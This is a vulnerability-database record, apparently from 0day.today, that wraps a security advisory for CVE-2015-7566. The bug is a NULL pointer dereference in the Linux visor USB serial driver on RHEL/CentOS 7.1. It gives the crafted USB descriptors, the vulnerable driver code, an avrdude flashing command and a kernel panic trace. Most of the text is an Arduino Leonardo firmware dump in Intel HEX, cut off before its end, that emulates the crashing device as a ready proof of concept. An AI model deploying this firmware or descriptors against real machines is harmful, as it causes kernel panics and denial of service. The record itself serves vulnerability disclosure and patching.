{"id": "1337DAY-ID-25869", "type": "zdt", "bulletinFamily": "exploit", "title": "Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor clie_5_attach Nullpointer Dereference", "description": "Exploit for linux platform in category dos / poc", "published": "2016-03-09T00:00:00", "modified": "2016-03-09T00:00:00", "cvss": {"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/", "score": 4.9}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/25869", "reporter": "OpenSource Security", "references": [], "cvelist": ["CVE-2015-7566"], "immutableFields": [], "lastseen": "2018-03-14T02:41:30", "viewCount": 18, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cloudfoundry", "idList": ["CFOUNDRY:C4D044657909D168617F0C63F623467E"]}, {"type": "cve", "idList": ["CVE-2015-7566"]}, {"type": "debian", "idList": ["DEBIAN:DLA-412-1:99076", "DEBIAN:DSA-3448-1:04492", "DEBIAN:DSA-3448-1:C7742", "DEBIAN:DSA-3503-1:23448", "DEBIAN:DSA-3503-1:9DDFA"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2015-7566"]}, {"type": "exploitdb", "idList": ["EDB-ID:39540"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C617424ADAF7B063C6D9C6F505360E69"]}, {"type": "fedora", "idList": ["FEDORA:0D267606CFB3", "FEDORA:1CCEF6087EB7", "FEDORA:A5C89601FC0F"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-412.NASL", "DEBIAN_DSA-3448.NASL", "DEBIAN_DSA-3503.NASL", "EULEROS_SA-2019-1488.NASL", "EULEROS_SA-2019-1530.NASL", "FEDORA_2016-26E19F042A.NASL", "FEDORA_2016-5D43766E33.NASL", "FEDORA_2016-B59FD603BE.NASL", "OPENSUSE-2016-1015.NASL", "SUSE_SU-2016-1203-1.NASL", "SUSE_SU-2016-1672-1.NASL", "SUSE_SU-2016-2074-1.NASL", "UBUNTU_USN-2929-1.NASL", "UBUNTU_USN-2929-2.NASL", "UBUNTU_USN-2930-1.NASL", "UBUNTU_USN-2930-2.NASL", "UBUNTU_USN-2930-3.NASL", "UBUNTU_USN-2932-1.NASL", "UBUNTU_USN-2948-1.NASL", "UBUNTU_USN-2948-2.NASL", "UBUNTU_USN-2967-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310703448", "OPENVAS:1361412562310703503", "OPENVAS:1361412562310806985", "OPENVAS:1361412562310807219", "OPENVAS:1361412562310842686", "OPENVAS:1361412562310842690", "OPENVAS:1361412562310842691", "OPENVAS:1361412562310842692", "OPENVAS:1361412562310842693", "OPENVAS:1361412562310842698", "OPENVAS:1361412562310842713", "OPENVAS:1361412562310842735", "OPENVAS:1361412562310842741", "OPENVAS:1361412562310851386", "OPENVAS:1361412562311220191488", "OPENVAS:1361412562311220191530", "OPENVAS:703448", "OPENVAS:703503"]}, {"type": "osv", "idList": ["OSV:DLA-412-1", "OSV:DSA-3448-1", "OSV:DSA-3503-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:136141"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:2144-1", "OPENSUSE-SU-2016:2649-1", "SUSE-SU-2016:1203-1", "SUSE-SU-2016:1672-1", "SUSE-SU-2016:1707-1", "SUSE-SU-2016:1764-1", "SUSE-SU-2016:2074-1"]}, {"type": "ubuntu", "idList": ["USN-2929-1", "USN-2929-2", "USN-2930-1", "USN-2930-2", "USN-2930-3", "USN-2932-1", "USN-2948-1", "USN-2948-2", "USN-2967-1", "USN-2967-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-7566"]}]}, "backreferences": {"references": [{"type": "canvas", "idList": ["UDEVD"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C4D044657909D168617F0C63F623467E"]}, {"type": "cve", "idList": ["CVE-2015-7566"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3448-1:C7742"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2015-7566"]}, {"type": "exploitdb", "idList": ["EDB-ID:39540"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C617424ADAF7B063C6D9C6F505360E69"]}, {"type": "fedora", "idList": ["FEDORA:1CCEF6087EB7"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-412.NASL", "FEDORA_2016-26E19F042A.NASL", "UBUNTU_USN-2930-1.NASL", "UBUNTU_USN-2930-2.NASL", "UBUNTU_USN-2930-3.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842691"]}, {"type": "suse", "idList": ["SUSE-SU-2016:1203-1"]}, {"type": "threatpost", "idList": ["THREATPOST:5D5241707AB76ED799696E37D048872A", "THREATPOST:7876640D5EC3E8FE3FE885606BBB1C6D"]}, {"type": "ubuntu", "idList": ["USN-2929-1", "USN-2929-2", "USN-2930-1", "USN-2930-2", "USN-2930-3", "USN-2932-1", "USN-2948-1", "USN-2948-2", "USN-2967-1", "USN-2967-2"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-7566", "epss": "0.002970000", "percentile": "0.645630000", "modified": "2023-03-14"}], "vulnersScore": -0.0}, "sourceHref": "https://0day.today/exploit/25869", "sourceData": "Linux visor clie_5_attach Nullpointer Dereference\r\n \r\nDate: March 4th, 2016\r\nAuthors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg\r\nCVE: CVE-2015-7566\r\nCVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)\r\nTitle: Local RedHat Enterprise Linux DoS \u00e2?? RHEL 7.1 Kernel crashes on invalid \r\nUSB device descriptors (visor clie_5_attach driver)\r\nSeverity: Critical. The Kernel panics. A reboot is required.\r\nEase of Exploitation: Trivial\r\nVulnerability type: Wrong input validation\r\nProducts: RHEL 7.1 including all updates\r\nKernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the \r\nCentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)\r\nVendor: Red Hat\r\nVendor contacted: November, 12th 2015\r\nPDF of advisory: https://os-s.net/advisories/OSS-2016-09_visor_clie_5_attach.pdf\r\n \r\nAbstract:\r\nThe Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB \r\ndevice requiring the visor (clie_5_attach) driver.\r\n \r\nDetailed product description:\r\nWe confirmed the bug on the following system:\r\nRHEL 7.1\r\nKernel 3.10.0-229.20.1.el7.x86_64\r\nFurther products or kernel versions have not been tested.\r\nHow reproducible: Always\r\nActual results: Kernel crashes.\r\n \r\nDescription:\r\nThe bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo \r\n(github.com/schumilo) using the following device descriptor:\r\n \r\n[*] Device-Descriptor\r\nbLength: 0x12\r\nbDescriptorType: 0x1\r\nbcdUSB: 0x200\r\nbDeviceClass: 0x3\r\nbDeviceSubClass: 0x0\r\nbDeviceProtocol: 0x0\r\nbMaxPacketSize: 0x40\r\nidVendor: 0x54c\r\nidProduct: 0x144\r\nbcdDevice: 0x100\r\niManufacturer: 0x1\r\niProduct: 0x2\r\niSerialNumbers: 0x3\r\nbNumConfigurations: 0x1\r\n \r\nThe clie_5_attach function of the visor driver, which is called during the \r\ndriver initialization process, expects an OUT-Bulk-Endpoint. \r\nDue to an incomplete sanity check, the visor driver tries to dereference null-\r\npointers. \r\nThis results in a crash of the system.\r\n \r\n****\r\n$ nm visor.ko.debug | grep clie_5_attach\r\n0000000000000030 t clie_5_attach\r\n$ addr2line -e visor.ko.debug 6d\r\n/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_\r\n64/drivers/usb/serial/visor.c:610\r\n****\r\n \r\n**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/visor.c)\r\n...\r\n607\r\n608 pipe = usb_sndbulkpipe(serial->dev, port->bulk_out_endpointAddress);\r\n609 for (j = 0; j < ARRAY_SIZE(port->write_urbs); ++j)\r\n610 port->write_urbs[j]->pipe = pipe; /* if there is no configured OUT-\r\nbulk-endpoint, the kernel tries to dereference null-pointers */\r\n611\r\n612 return 0;\r\n613 }\r\n...\r\n****\r\n \r\n[*] Configuration-Descriptor\r\nbLength: 0x9\r\nbDescriptorType: 0x2\r\nwTotalLength: 0x27\r\nbNumInterfaces: 0x1\r\nbConfigurationValue: 0x1\r\niConfiguration: 0x0\r\nbmAttributes: 0x0\r\nbMaxPower: 0x31\r\n[*] Interface-Descriptor\r\nbLength: 0x9\r\nbDescriptorType: 0x4\r\nbInterfaceNumber: 0x0\r\nbAlternateSetting: 0x0\r\nbNumEndpoints: 0x3\r\nbInterfaceClass: 0x0\r\nbInterfaceSubClass: 0x0\r\nbInterfaceProtocol: 0x0\r\n[*] Endpoint-Descriptor:\r\nbLength: 0x7\r\nbDescriptorType: 0x5\r\nbEndpointAddress: 0x81 \u00ef?? IN-Direction\r\nbmAttribut: 0x1 \u00ef?? ISO-Transfer\r\nwMaxPacketSize: 0x404\r\nbInterval: 0xc\r\n[*] Endpoint-Descriptor:\r\nbLength: 0x7\r\nbDescriptorType: 0x5\r\nbEndpointAddress: 0x1 \u00ef??OUT-Direction\r\nbmAttribut: 0x1 \u00ef??ISO-Transfer (change this \r\nvalue to 0x2, which is the value for bulk-transfer without additional \r\nfeatures, and the visor driver won't crash)\r\nwMaxPacketSize: 0x4\r\nbInterval: 0xc\r\n[*] Endpoint-Descriptor:\r\nbLength: 0x7\r\nbDescriptorType: 0x5\r\nbEndpointAddress: 0x82 \u00ef??IN-Direction\r\nbmAttribut: 0x1 \u00ef??ISO-Transfer\r\nwMaxPacketSize: 0x4\r\nbInterval: 0xc\r\n \r\nProof of Concept:\r\nFor a proof of concept, we are providing an Arduino Leonardo firmware file. This \r\nfirmware will emulate the defective USB device.\r\n \r\navrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U \r\nflash:w:binary.hex\r\n \r\nThe firmware has been attached to this bug report.\r\nTo prevent the automated delivery of the payload, a jumper may be used to \r\nconnect port D3 and 3V3!\r\n \r\nSeverity and Ease of Exploitation:\r\nThe vulnerability can be easily exploited. Using our Arduino Leonardo firmware, \r\nonly physical access to the system is required.\r\n \r\nVendor Communication:\r\nWe contacted Red Hat on the November, 12th 2015.\r\nThis bug was fixed upstream. A CVE number was not assigned.\r\n \r\nReferences:\r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1283371\r\nhttp://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?i\r\nd=cb3232138e37129e88240a98a1d2aba2187ff57c\r\n \r\nKernel Stacktrace:\r\n \r\n[ 34.568077] usb 1-1: new full-speed USB device number 2 using xhci_hcd\r\n[ 34.791731] usb 1-1: New USB device found, idVendor=054c, idProduct=0144\r\n[ 34.795463] usb 1-1: New USB device strings: Mfr=1, Product=2, \r\nSerialNumber=3\r\n[ 34.799619] usb 1-1: Product: \u00c4?\r\n[ 34.804592] usb 1-1: Manufacturer: \u00c4?\r\n[ 34.810144] usb 1-1: SerialNumber: %\r\n[ 34.872285] usbcore: registered new interface driver visor\r\n[ 34.879838] usbserial: USB Serial support registered for Handspring Visor / \r\nPalm OS\r\n[ 34.890481] usbserial: USB Serial support registered for Sony Clie 5.0\r\n[ 34.897769] usbserial: USB Serial support registered for Sony Clie 3.5\r\n[ 34.914162] visor 1-1:1.0: Sony Clie 5.0 converter detected\r\n[ 34.920288] BUG: unable to handle kernel NULL pointer dereference at \r\n0000000000000058\r\n[ 34.921136] IP: [<ffffffffa039306d>] clie_5_attach+0x3d/0x60 [visor]\r\n[ 34.921136] PGD 0 \r\n[ 34.921136] Oops: 0002 [#1] SMP \r\n[ 34.921136] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT \r\nxt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables \r\nip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle \r\nip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat \r\nnf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack \r\niptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm \r\nppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 \r\ni2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif \r\ncdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy \r\ndm_mirror dm_region_hash dm_log dm_mod\r\n[ 34.921136] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted \r\n3.10.0-229.14.1.el7.x86_64 #1\r\n[ 34.921136] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS \r\nrel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014\r\n[ 34.921136] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000\r\n[ 34.921136] RIP: 0010:[<ffffffffa039306d>] [<ffffffffa039306d>] \r\nclie_5_attach+0x3d/0x60 [visor]\r\n[ 34.921136] RSP: 0018:ffff88000bd23a80 EFLAGS: 00010286\r\n[ 34.921136] RAX: 00000000c0000200 RBX: ffff88000af979d0 RCX: 0000000000000000\r\n[ 34.921136] RDX: ffff88000be6b000 RSI: ffff88000af979c0 RDI: ffff88000af979c0\r\n[ 34.921136] RBP: ffff88000bd23a80 R08: 0000000000000000 R09: 0000000000000000\r\n[ 34.921136] R10: 0000000000000000 R11: ffff88000c3b9800 R12: ffff88000af979d0\r\n[ 34.921136] R13: ffff88000c525830 R14: ffff88000af979c0 R15: ffffffffa0395200\r\n[ 34.921136] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) \r\nknlGS:0000000000000000\r\n[ 34.921136] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b\r\n[ 34.921136] CR2: 0000000000000058 CR3: 000000000d2a1000 CR4: \r\n00000000000006f0\r\n[ 34.921136] DR0: 0000000000000000 DR1: 0000000000000000 DR2: \r\n0000000000000000\r\n[ 34.921136] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400\r\n[ 34.921136] Stack:\r\n[ 34.921136] ffff88000bd23c18 ffffffff8145fed1 0000000000000007 000000020bd23af8\r\n[ 34.921136] ffff88000c525830 0000000000000000 0000000000000000 ffffffff00000000\r\n[ 34.921136] ffff88000bcd0000 ffff880000000001 ffff88000bcd0090 0000000000000000\r\n[ 34.921136] Call Trace:\r\n[ 34.921136] [<ffffffff8145fed1>] usb_serial_probe+0xdb1/0x1230\r\n[ 34.921136] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0\r\n[ 34.921136] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0\r\n[ 34.921136] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0\r\n[ 34.921136] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100\r\n[ 34.921136] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0\r\n[ 34.921136] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390\r\n[ 34.921136] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0\r\n[ 34.921136] [<ffffffff813d3420>] ? __device_attach+0x40/0x40\r\n[ 34.921136] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0\r\n[ 34.921136] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20\r\n[ 34.921136] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580\r\n[ 34.921136] [<ffffffffa0398000>] ? 0xffffffffa0397fff\r\n[ 34.921136] [<ffffffffa039801e>] usb_serial_module_init+0x1e/0x1000 [visor]\r\n[ 34.921136] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230\r\n[ 34.921136] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40\r\n[ 34.921136] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0\r\n[ 34.921136] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150\r\n[ 34.921136] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0\r\n[ 34.921136] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b\r\n[ 34.921136] Code: 28 48 8b 57 20 0f b6 80 28 02 00 00 88 82 28 02 00 00 48 \r\n8b 0f c1 e0 0f 0d 00 00 00 c0 8b 09 c1 e1 08 09 c8 48 8b 8a 10 02 00 00 <89> \r\n41 58 48 8b 92 18 02 00 00 89 42 58 31 c0 5d c3 66 90 b8 ff \r\n[ 34.921136] RIP [<ffffffffa039306d>] clie_5_attach+0x3d/0x60 [visor]\r\n[ 34.921136] RSP <ffff88000bd23a80>\r\n[ 34.921136] CR2: 0000000000000058\r\n[ 35.341720] ---[ end trace b239663354a1c556 ]---\r\n[ 35.347341] Kernel panic - not syncing: Fatal exception\r\n[ 35.348314] drm_kms_helper: panic occurred, switching back to text console\r\n \r\nArduino Leonardo Firmware:\r\n \r\n:100000000C94A8000C94C5000C94C5000C94C50079\r\n:100010000C94C5000C94C5000C94C5000C94C5004C\r\n:100020000C94C5000C94C5000C94C4050C942F04CA\r\n:100030000C94C5000C94C5000C94C5000C94C5002C\r\n:100040000C94C5000C94C5000C94C5000C94C5001C\r\n:100050000C94C5000C94C5000C94C5000C940E02C1\r\n:100060000C94C5000C94C5000C94C5000C94C500FC\r\n:100070000C94C5000C94C5000C94C5000C94C500EC\r\n:100080000C94C5000C94C5000C94C5000C94C500DC\r\n:100090000C94C5000C94C5000C94C5000C94C500CC\r\n:1000A0000C94C5000C94C5000C94C5000B030E0302\r\n:1000B000010305032F032F032F03120316031A0353\r\n:1000C000200324032F032A030000000200080E006F\r\n:1000D00000030401000B000000000000000000000D\r\n:1000E00000000000000004080201104080401020C1\r\n:1000F00040804080080204018040201002011080EE\r\n:100100001020404004040404040304050202020217\r\n:1001100004030202020206060606060604040202A0\r\n:100120000204000000002300260029002C002F00FC\r\n:1001300000000000250028002B002E0031000000E8\r\n:100140000000240027002A002D00300000C180811B\r\n:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077\r\n:10016000B1E0E4EDF3E102C005900D92A436B107D1\r\n:10017000D9F725E0A4E6B5E001C01D92AF37B2077C\r\n:10018000E1F70E94C8000C9404070C940000089545\r\n:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421\r\n:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B\r\n:1001B00083E00E94300361E087E00E94300361E049\r\n:1001C00088E00E9430030E9459067E012AE9E20E6F\r\n:1001D000F11C84E093E0D70111969C938E9389E003\r\n:1001E00094E013969C938E93129782E2E2E1F1E001\r\n:1001F0009E012F5F3F4F6901D90101900D928A95B1\r\n:10020000E1F788E1E4E3F1E0DE01939601900D92DD\r\n:100210008A95E1F782E1ECE4F1E0DE01DB96019002\r\n:100220000D928A95E1F789E0EEE5F1E0DE01A05953\r\n:10023000BF4F01900D928A95E1F72A593F4F99E0FF\r\n:10024000992ED901E92D1D92EA95E9F78E010957FA\r\n:100250001F4F87E0E7E6F1E0D80101900D928A9503\r\n:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189\r\n:1002700001900D928A95E1F7AE0147585F4F87E0F4\r\n:10028000E5E7F1E0DA0101900D928A95E1F75E0170\r\n:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D\r\n:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172\r\n:1002B0001D92EA95E9F7E3E0DC011996EC93D90188\r\n:1002C0009C92F4E01196FC9311971496EC93F9012B\r\n:1002D000DC01292D01900D922A95E1F7FE01EC56E3\r\n:1002E000FF4FDC011B96FC93EE931A971D96BC9270\r\n:1002F000AE921C971183008373836283558344837A\r\n:100300000C5211092CE0F80111922A95E9F721E02D\r\n:10031000D80119962C931997FE01E059FF4F0190CF\r\n:100320000D929A94E1F7F8019387828761E088E063\r\n:100330000E9469038BE492E00E94650688E892E0DF\r\n:100340000E94650687EC92E00E94650686E093E0D5\r\n:100350000E94650682E493E00E9465068FE793E0C1\r\n:100360000E94650684EA93E00E9465068BEE93E0A6\r\n:100370000E94650683E00E949F03892B09F047C015\r\n:100380005E01F3E2AF0EB11C8824839482E1982EC3\r\n:1003900084E194E00E946506BF92AF92DF92CF9213\r\n:1003A000FF92EF921F928F921F930F932DB73EB73C\r\n:1003B000225131090FB6F8943EBF0FBE2DBFADB725\r\n:1003C000BEB71196FE01FB96892D01900D928A957C\r\n:1003D000E1F78DE695E00E94030668E873E180E0AE\r\n:1003E00090E00E947B028DE695E00E944E0660E060\r\n:1003F00087E00E94690368E873E180E090E00E9472\r\n:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E\r\n:1004100070E080E090E00E947B02ACCF1F920F92D0\r\n:100420000FB60F9211242F933F938F939F93AF9307\r\n:10043000BF938091650590916605A0916705B09185\r\n:1004400068053091640523E0230F2D3720F40196D1\r\n:10045000A11DB11D05C026E8230F0296A11DB11DE7\r\n:10046000209364058093650590936605A0936705C6\r\n:10047000B09368058091690590916A05A0916B051C\r\n:10048000B0916C050196A11DB11D809369059093F3\r\n:100490006A05A0936B05B0936C05BF91AF919F91D6\r\n:1004A0008F913F912F910F900FBE0F901F90189535\r\n:1004B0003FB7F8948091690590916A05A0916B050A\r\n:1004C000B0916C0526B5A89B05C02F3F19F0019689\r\n:1004D000A11DB11D3FBF6627782F892F9A2F620F6C\r\n:1004E000711D811D911D42E0660F771F881F991FA6\r\n:1004F0004A95D1F70895CF92DF92EF92FF92CF9372\r\n:10050000DF936B017C010E945802EB01C114D104FE\r\n:10051000E104F10479F00E9458026C1B7D0B683EE7\r\n:100520007340A0F381E0C81AD108E108F108C8516E\r\n:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029\r\n:100540000895789484B5826084BD84B5816084BD4B\r\n:1005500085B5826085BD85B5816085BDEEE6F0E03C\r\n:10056000808181608083E1E8F0E010828081826098\r\n:100570008083808181608083E0E8F0E08081816019\r\n:100580008083E1E9F0E08081826080838081816006\r\n:100590008083E0E9F0E0808181608083E1ECF0E03D\r\n:1005A000808184608083808182608083808181609B\r\n:1005B0008083E3ECF0E0808181608083E0ECF0E018\r\n:1005C000808182608083E2ECF0E0808181608083C2\r\n:1005D000EAE7F0E0808184608083808182608083AC\r\n:1005E000808181608083808180688083089590E02D\r\n:1005F000FC013197EE30F10590F5EA5AFF4F0C946B\r\n:10060000AB09809180008F7703C0809180008F7D3F\r\n:1006100080938000089584B58F7702C084B58F7D64\r\n:1006200084BD0895809190008F7707C080919000DD\r\n:100630008F7D03C080919000877F80939000089504\r\n:100640008091C0008F7703C08091C0008F7D809320\r\n:10065000C00008958091C200877F8093C2000895F2\r\n:10066000CF93DF9390E0FC01EA51FF4F2491FC010E\r\n:10067000EC5FFE4F8491882349F190E0880F991F29\r\n:10068000FC01E25CFE4FA591B491805D9E4FFC01A0\r\n:10069000C591D4919FB7611108C0F8948C912095B1\r\n:1006A00082238C93888182230AC0623051F4F894AB\r\n:1006B0008C91322F309583238C938881822B888371\r\n:1006C00004C0F8948C91822B8C939FBFDF91CF91C3\r\n:1006D00008950F931F93CF93DF931F92CDB7DEB78B\r\n:1006E000282F30E0F901E853FF4F8491F901EA51D6\r\n:1006F000FF4F1491F901EC5FFE4F04910023C9F004\r\n:10070000882321F069830E94F7026981E02FF0E0DD\r\n:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7\r\n:100720008C91611103C01095812301C0812B8C93A2\r\n:100730009FBF0F90DF91CF911F910F910895CF939D\r\n:10074000DF93282F30E0F901E853FF4F8491F9013E\r\n:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5\r\n:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5\r\n:10077000EE5DFE4FA591B4912C912D2381E090E088\r\n:1007800021F480E002C080E090E0DF91CF910895F5\r\n:10079000615030F02091F100FC0120830196F8CFE8\r\n:1007A000289884E680937D0508951092E9001092C0\r\n:1007B00071051092700590936F0580936E050895F2\r\n:1007C000FF920F931F93CF93DF93F82E8B01EA01D3\r\n:1007D000BA01C8010E94A606F80120E030E08EEFC1\r\n:1007E0002C173D0791F1F7FE02C0A49101C0A08132\r\n:1007F000609170057091710540916E0550916F0583\r\n:1008000064177507ACF49091E8009570E1F390914E\r\n:10081000E80092FD1CC0A093F100A0917005B0917A\r\n:1008200071051196AF73BB27AB2B11F48093E800D1\r\n:10083000A0917005B09171051196B0937105A093C8\r\n:1008400070052F5F3F4F3196CBCFC90102C08FEFAC\r\n:100850009FEFDF91CF911F910F91FF9008951F920D\r\n:100860000F920FB60F9211246F927F928F929F92E8\r\n:10087000AF92BF92CF92DF92EF92FF920F931F93AE\r\n:100880002F933F934F935F936F937F938F939F9398\r\n:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3\r\n:1008A0006297DEBFCDBF1092E9008091E80083FF20\r\n:1008B00046C168E0CE010A960E94C80382EF809389\r\n:1008C000E8009A8597FF05C08091E80080FFFCCF83\r\n:1008D00003C08EEF8093E800892F807609F023C152\r\n:1008E0008B85811105C01092F1001092F10020C19A\r\n:1008F000282F2D7F213009F41BC1853049F48091C8\r\n:10090000E80080FFFCCF8C8580688093E30010C1F5\r\n:10091000863009F0E1C02D8508891989223009F057\r\n:10092000B3C0EC848E2D90E0209173053091740556\r\n:10093000821793070CF09FC00E94D5031F92EF927D\r\n:100940008DE394E09F938F930E9483068CE0E89E52\r\n:1009500070011124E0917505F0917605EE0DFF1DF3\r\n:1009600089E0DE01119601900D928A95E1F7C801A8\r\n:100970000E94D50349E050E0BE016F5F7F4F80E0E9\r\n:100980000E94E0030F900F900F900F90C12CD12C7C\r\n:10099000612C712C33E7A32E34E0B32E4AEA842E67\r\n:1009A00044E0942EE0917505F0917605EE0DFF1D63\r\n:1009B000818590E0681679060CF0BAC07F926F923C\r\n:1009C000BF92AF920E948306E0917505F091760583\r\n:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5\r\n:1009E00080E00E94E0030F900F900F900F9000E0C6\r\n:1009F00010E0E0917505F0917605EE0DFF1D028483\r\n:100A0000F385E02DEC0DFD1D818590E00817190799\r\n:100A10005CF51F930F939F928F920E948306E09143\r\n:100A20007505F0917605EE0DFF1D0284F385E02D2E\r\n:100A3000EC0DFD1DC801880F991FA485B585A80F71\r\n:100A4000B91F4D915C910284F385E02DE80FF91FE9\r\n:100A50006081718180E00E94E0030F5F1F4F0F9063\r\n:100A60000F900F900F90C5CF8FEF681A780A8EE025\r\n:100A7000C80ED11C97CF8FED94E09F938F930E9467\r\n:100A800083060F900F9058C0C8012A8B0E94D5038F\r\n:100A90002A892130C1F0233009F04EC08C851F9285\r\n:100AA0008F9389EF94E09F938F930E94830642E097\r\n:100AB00050E062E871E080E00E94E0030F900F9048\r\n:100AC0000F900F9035C04091000150E060E071E060\r\n:100AD00080E00E94E0032CC0873071F1883021F45F\r\n:100AE00081E08093F10024C0893011F5937021F5E5\r\n:100AF000EDE4F1E081E021E096E38093E9002093CA\r\n:100B0000EB0034913093EC009093ED008F5F3196C1\r\n:100B1000843099F78EE78093EA001092EA008C8582\r\n:100B20008093720505C0888999890E94D50304C005\r\n:100B30008EEF8093E80003C081E28093EB00629621\r\n:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE\r\n:100B5000EF91BF91AF919F918F917F916F915F9135\r\n:100B60004F913F912F911F910F91FF90EF90DF9048\r\n:100B7000CF90BF90AF909F908F907F906F900F908D\r\n:100B80000FBE0F901F9018951F920F920FB60F92E5\r\n:100B900011248F939F938091E1001092E10083FFD5\r\n:100BA0000FC01092E90091E09093EB001092EC00DE\r\n:100BB00092E39093ED001092720598E09093F0000C\r\n:100BC00082FF1AC080917E05882339F080917E05CE\r\n:100BD000815080937E05882369F080917D0588236C\r\n:100BE00059F080917D05815080937D05811104C06D\r\n:100BF000289A02C05D9AF1CF9F918F910F900FBEFE\r\n:100C00000F901F901895CF93DF93CDB7DEB782E199\r\n:100C1000FE013596A0E0B1E001900D928A95E1F7D2\r\n:100C20008F89988D9093760580937505898D9A8D1F\r\n:100C300090937405809373058B8D9C8D90937C05A8\r\n:100C400080937B058D8D9E8D90937A058093790599\r\n:100C50008F8D98A1909378058093770510927205F7\r\n:100C600081E08093D70080EA8093D80082E189BD3B\r\n:100C700009B400FEFDCF61E070E080E090E00E94EA\r\n:100C80007B0280E98093D8008CE08093E200109290\r\n:100C9000E000559A209ADF91CF91089581E08093EA\r\n:100CA000E00008959091C80095FFFCCF8093CE009E\r\n:100CB00008951092CD0087E68093CC0088E1809360\r\n:100CC000C9008EE08093CA0008950F931F93CF93BD\r\n:100CD000DF93EC018C01FE0101900020E9F73197D0\r\n:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E\r\n:100CF000F80181918F010E945206EDCFDF91CF91D3\r\n:100D00001F910F910895CF93DF93CDB7DEB7DA959A\r\n:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6\r\n:100D2000419151919F0160E071E0CE0101960E94D6\r\n:100D30000707CE0101960E946506D3950FB6F89479\r\n:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE\r\n:100D5000AF92BF92CF92DF92EF92FF920F931F93C9\r\n:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E\r\n:100D70003F932F9389839A830E9483068981882ECB\r\n:100D80009A81992E0F900F9000E010E08EE5E82EEA\r\n:100D900085E0F82E91E1C92E94E0D92E0A151B05A5\r\n:100DA000E4F4F40181914F0190E09F938F93FF92BF\r\n:100DB000EF920E9483060F5F1F4FC8018F70992723\r\n:100DC0000F900F900F900F90892B41F7DF92CF92E9\r\n:100DD0000E9483060